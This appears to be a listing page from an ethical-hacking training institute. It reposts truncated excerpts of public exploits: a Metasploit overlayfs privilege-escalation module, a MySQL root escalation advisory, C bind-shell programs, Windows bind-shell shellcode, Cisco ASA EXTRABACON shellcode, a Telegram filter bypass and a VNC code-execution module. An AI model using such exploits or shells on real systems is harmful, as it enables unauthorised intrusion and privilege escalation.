Exploits

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require “msf/core”
 
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
 
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
        ‘Name’           => ‘Overlayfs Privilege Escalation’,
        ‘Description’    => %q{
          This module attempts to exploit two different CVEs related to overlayfs.
          CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
                                            3.16.0-25 […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB   –   Root Privilege Escalation
 
MySQL 
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CripSlick
#include <stdio.h>
#include <string.h>
 

 
//|=========================================================================================
//|=============== CripSlick’s Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C “fork”
#include <stdlib.h> //| needed for C “system”
 
//|=====================================================================================================
//|================================ CripSlick’s Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick’s NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Brother Roziul Hasan Khan
/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd  
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: RiskSense
Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes);

 Description:
            This is not the same shellcode as the Equation Group version,
            but accomplishes the same task of disabling the auth functions
            […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Malware4u
#########################################################################
# Exploit Title: Telegram Web Empty Username Bypass
# version : Telegram Web 0.5.5
# Tested on: Windows 10
##########################################################################
Description:
Telegram filters null bytes for username input but you can bypass this
filter with “NOP”s (0x90) on web version of Telegram because this
filter isn’t from server’s codes side
##########################################################################
Step 1:
First […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

A special cyber unit of the Bundeswehr (German Armed Forces) carried out Germany’s first ever offensive cyber-operation by hacking into the network of an Afghani mobile operator to track the location of a group of kidnappers that had taken hostage a young German woman.

The woman, […]

Advanced Ethical Hacking Institute in Pune

Full title
VNC Keyboard Remote Code Execution Exploit

Date add
13-07-2015

Category
remote exploits

Platform
multiple

Risk

Security Risk Critical

Description:
This Metasploit module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems a xterm terminal is opened […]